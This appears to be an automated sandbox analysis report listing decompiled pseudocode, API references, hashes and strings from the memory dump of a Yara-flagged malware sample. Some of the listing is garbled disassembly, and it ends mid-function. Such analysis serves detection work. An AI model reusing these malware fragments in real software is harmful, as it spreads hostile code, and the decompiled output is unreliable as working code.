                                                                            0x004188ba
                                                                            0x004188c2
                                                                            0x004188cd
                                                                            0x004188d1
                                                                            0x004188e0
                                                                            0x004188e1
                                                                            0x004188e3
                                                                            0x004188e6
                                                                            0x004188ef
                                                                            0x004188ef
                                                                            0x004188ff
                                                                            0x00418902
                                                                            0x0041890d
                                                                            0x0041890f
                                                                            0x00418910
                                                                            0x00418911
                                                                            0x00418911

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateFree
                                                                            • String ID: F5A
                                                                            • API String ID: 2488874121-683449296
                                                                            • Opcode ID: 37f69f484ca45f7459a1b64255040918bd6cf93917e722737f6b46c40e891233
                                                                            • Instruction ID: 44880b60090aabbdcaa74a99a08852773980f0c1a0aa9405f98cdf5d61cc9b4a
                                                                            • Opcode Fuzzy Hash: 37f69f484ca45f7459a1b64255040918bd6cf93917e722737f6b46c40e891233
                                                                            • Instruction Fuzzy Hash: 48F0AFB2210208AFDB14EF59DC45EE733A8EF88350F018599FD0897341E630EA10CBB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				intOrPtr* _t8;
				void* _t10;

				_t8 = E004191D0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				asm("adc al, 0x9");
				 *_t8 =  *_t8 + _t8;
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                            0x004188b7
                                                                            0x004188b8
                                                                            0x004188ba
                                                                            0x004188c2
                                                                            0x004188cd
                                                                            0x004188d1

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: F5A
                                                                            • API String ID: 1279760036-683449296
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 82%
                                                                            			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                            0x00407290
                                                                            0x0040729f
                                                                            0x004072a3
                                                                            0x004072ae
                                                                            0x004072be
                                                                            0x004072ce
                                                                            0x004072d3
                                                                            0x004072da
                                                                            0x004072dd
                                                                            0x004072ea
                                                                            0x004072ec
                                                                            0x004072ee
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x00000000
                                                                            0x0040730d
                                                                            0x00407312

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                                            • Instruction ID: a55241834724a4f9522fcddb18cdf12f322e24b5025e529ea1e7499cfe7347ca
                                                                            • Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                                            • Instruction Fuzzy Hash: 88018431A8022876E721BA959C03FFF776C5B00B55F14015AFF04BA1C2E6A8790586FA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D180, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 56%
                                                                            			E0040D180(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v526;
				char _v528;
				void* _t14;
				intOrPtr _t15;

				_push(0x206);
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
				_push(0);
				_push( &_v526);
				_v8 = 0;
				_v528 = 0;
				E0041A130();
				_t23 = _a4;
				E0040A020(0, _a4,  &_v528, 0x10);
				_t14 = E0040D090(_a4,  &_v528,  &_v8); // executed
				_t15 = _v8;
				if(_t14 == 0) {
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00418700(_t23, _t15);
						}
					}
					__eflags = 0;
					return 0;
				} else {
					if(_t15 != 0) {
						E00418700(_t23, _t15);
					}
					return 1;
				}
			}








                                                                            0x0040d18c
                                                                            0x0040d18f
                                                                            0x0040d191
                                                                            0x0040d198
                                                                            0x0040d199
                                                                            0x0040d1a0
                                                                            0x0040d1a7
                                                                            0x0040d1ac
                                                                            0x0040d1b9
                                                                            0x0040d1ca
                                                                            0x0040d1d4
                                                                            0x0040d1d7
                                                                            0x0040d1f1
                                                                            0x0040d1f3
                                                                            0x0040d1f5
                                                                            0x0040d1f9
                                                                            0x0040d1fd
                                                                            0x0040d202
                                                                            0x0040d1f9
                                                                            0x0040d205
                                                                            0x0040d20b
                                                                            0x0040d1d9
                                                                            0x0040d1db
                                                                            0x0040d1df
                                                                            0x0040d1e4
                                                                            0x0040d1f0
                                                                            0x0040d1f0

                                                                            APIs
                                                                            • GetCursorFrameInfo.USER32 ref: 0040D1FD
                                                                              • Part of subcall function 00418700: NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCursorFrameInfo
                                                                            • String ID:
                                                                            • API String ID: 3080600085-0
                                                                            • Opcode ID: 11e1b587b0b723f33c6eec4dc57c4c8737af9baab7f4dd186d0ee9c90f48d5dd
                                                                            • Instruction ID: bd81075953d2205da9fb6e517c829ef89d1e5fe7a1563ce4eb2a272c121b1272
                                                                            • Opcode Fuzzy Hash: 11e1b587b0b723f33c6eec4dc57c4c8737af9baab7f4dd186d0ee9c90f48d5dd
                                                                            • Instruction Fuzzy Hash: 0A01B5B5D112187ADB10AA919C05FEB736C8F05314F0041AAFC18A6182FA789F544BEA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409B43, Relevance: 1.5, APIs: 1, Instructions: 42libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 25%
                                                                            			E00409B43(void* __eax, void* __edi, void* __eflags, void* _a8, void* _a16) {
				void* _v0;
				void* _v4;
				void* _v8;
				void* _v12;
				void* _v528;
				void* _t20;
				void* _t39;

				asm("loop 0x2f");
				asm("enter 0x38e4, 0x39");
				asm("outsb");
				_t20 = _t39;
				if (__eflags >= 0) goto L7;
			}










                                                                            0x00409b45
                                                                            0x00409b49
                                                                            0x00409b4d
                                                                            0x00409b4e
                                                                            0x00409b4f

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                                            • Instruction ID: 5a7f1c5f613fd2d39734e4e3144daf8f743a8f34f36f31e24c5c9ec0a7e275d5
                                                                            • Opcode Fuzzy Hash: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                                            • Instruction Fuzzy Hash: 40F0A4B1A4010EABCF00DA90E842F9DB774EB54318F0082A6E91C9B291F675EA45CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                            0x004188ef
                                                                            0x004188f7
                                                                            0x0041890d
                                                                            0x00418911

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E004191D0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                            0x00418a5a
                                                                            0x00418a70
                                                                            0x00418a74

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418920(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E004191D0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                            0x00418923
                                                                            0x0041893a
                                                                            0x00418948

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                            • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c18a46149dcfd58348ae5ef0cebb40be6e57c3460470bd0b9ff790152db10e80
                                                                            • Instruction ID: f346144787b49c8d1977c28451338eb954543f7c4a598df3c218e84b926724c5
                                                                            • Opcode Fuzzy Hash: c18a46149dcfd58348ae5ef0cebb40be6e57c3460470bd0b9ff790152db10e80
                                                                            • Instruction Fuzzy Hash: 63B09BB19014C5C5D751D7A4464871B7A4077D4745F26C066D2420681B4778C091F6F5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0112B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0112B38F
                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0112B39B
                                                                            • The resource is owned exclusively by thread %p, xrefs: 0112B374
                                                                            • The resource is owned shared by %d threads, xrefs: 0112B37E
                                                                            • read from, xrefs: 0112B4AD, 0112B4B2
                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0112B48F
                                                                            • *** Inpage error in %ws:%s, xrefs: 0112B418
                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0112B352
                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0112B47D
                                                                            • *** enter .exr %p for the exception record, xrefs: 0112B4F1
                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0112B484
                                                                            • *** enter .cxr %p for the context, xrefs: 0112B50D
                                                                            • an invalid address, %p, xrefs: 0112B4CF
                                                                            • write to, xrefs: 0112B4A6
                                                                            • Go determine why that thread has not released the critical section., xrefs: 0112B3C5
                                                                            • *** then kb to get the faulting stack, xrefs: 0112B51C
                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0112B476
                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0112B2F3
                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0112B2DC
                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0112B3D6
                                                                            • The instruction at %p tried to %s , xrefs: 0112B4B6
                                                                            • This failed because of error %Ix., xrefs: 0112B446
                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0112B53F
                                                                            • The critical section is owned by thread %p., xrefs: 0112B3B9
                                                                            • The instruction at %p referenced memory at %p., xrefs: 0112B432
                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0112B305
                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0112B323
                                                                            • <unknown>, xrefs: 0112B27E, 0112B2D1, 0112B350, 0112B399, 0112B417, 0112B48E
                                                                            • a NULL pointer, xrefs: 0112B4E0
                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0112B314
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                            • API String ID: 0-108210295
                                                                            • Opcode ID: 2a4d08e0dcc14b66d76b4793b876a965533a79653d7c5253720f1e37c62b25ba
                                                                            • Instruction ID: 56d333dce35efbe779d503ac9ce3b3987f09fdef5acc0900e30961eff3364c25
                                                                            • Opcode Fuzzy Hash: 2a4d08e0dcc14b66d76b4793b876a965533a79653d7c5253720f1e37c62b25ba
                                                                            • Instruction Fuzzy Hash: 2B812835A08220FFDB2E6F4ACC89E7B3F2AEF56A95F414048F5441F152D3A18461EB76
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01131C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 44%
                                                                            			E01131C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10548a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0107B150();
				} else {
					E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x116589c);
				E0107B150("Heap error detected at %p (heap handle %p)\n",  *0x11658a0);
				_t27 =  *0x1165898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01131E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0107B150();
				} else {
					E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0107B150("Error code: %d - %s\n",  *0x1165898);
				_t113 =  *0x11658a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0107B150("Parameter1: %p\n",  *0x11658a4);
				}
				_t115 =  *0x11658a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0107B150("Parameter2: %p\n",  *0x11658a8);
				}
				_t117 =  *0x11658ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0107B150("Parameter3: %p\n",  *0x11658ac);
				}
				_t119 =  *0x11658b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11658b4);
					E0107B150("Last known valid blocks: before - %p, after - %p\n",  *0x11658b0);
				} else {
					_t120 =  *0x11658b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0107B150();
				} else {
					E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0107B150("Stack trace available at %p\n", 0x11658c0);
			}











                                                                            0x01131c10
                                                                            0x01131c16
                                                                            0x01131c1e
                                                                            0x01131c3d
                                                                            0x01131c3e
                                                                            0x01131c20
                                                                            0x01131c35
                                                                            0x01131c3a
                                                                            0x01131c44
                                                                            0x01131c55
                                                                            0x01131c5a
                                                                            0x01131c65
                                                                            0x01131c67
                                                                            0x00000000
                                                                            0x01131c6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01131c67
                                                                            0x01131cdc
                                                                            0x01131ce5
                                                                            0x01131d04
                                                                            0x01131d05
                                                                            0x01131ce7
                                                                            0x01131cfc
                                                                            0x01131d01
                                                                            0x01131d0b
                                                                            0x01131d17
                                                                            0x01131d1f
                                                                            0x01131d25
                                                                            0x01131d30
                                                                            0x01131d4f
                                                                            0x01131d50
                                                                            0x01131d32
                                                                            0x01131d47
                                                                            0x01131d4c
                                                                            0x01131d61
                                                                            0x01131d67
                                                                            0x01131d68
                                                                            0x01131d6e
                                                                            0x01131d79
                                                                            0x01131d98
                                                                            0x01131d99
                                                                            0x01131d7b
                                                                            0x01131d90
                                                                            0x01131d95
                                                                            0x01131daa
                                                                            0x01131db0
                                                                            0x01131db1
                                                                            0x01131db7
                                                                            0x01131dc2
                                                                            0x01131de1
                                                                            0x01131de2
                                                                            0x01131dc4
                                                                            0x01131dd9
                                                                            0x01131dde
                                                                            0x01131df3
                                                                            0x01131df9
                                                                            0x01131dfa
                                                                            0x01131e00
                                                                            0x01131e0a
                                                                            0x01131e13
                                                                            0x01131e32
                                                                            0x01131e33
                                                                            0x01131e15
                                                                            0x01131e2a
                                                                            0x01131e2f
                                                                            0x01131e39
                                                                            0x01131e4a
                                                                            0x01131e02
                                                                            0x01131e02
                                                                            0x01131e08
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01131e08
                                                                            0x01131e5b
                                                                            0x01131e7a
                                                                            0x01131e7b
                                                                            0x01131e5d
                                                                            0x01131e72
                                                                            0x01131e77
                                                                            0x01131e95

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                            • API String ID: 0-2897834094
                                                                            • Opcode ID: 470a1cac4e5ed56eb680be2d43144f25e24fd67cfb78a02dca1c2bc0a9851be2
                                                                            • Instruction ID: 56168c449a5cbd72dfd9b87295e9bd7ff8075acfc13defdae26ec3be74a571d8
                                                                            • Opcode Fuzzy Hash: 470a1cac4e5ed56eb680be2d43144f25e24fd67cfb78a02dca1c2bc0a9851be2
                                                                            • Instruction Fuzzy Hash: 01610C3A910281EFD36DD74AE448D3573A9EB8497078A803EF8495F715E7359C908F1E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01134AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E01134AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0107B150();
						} else {
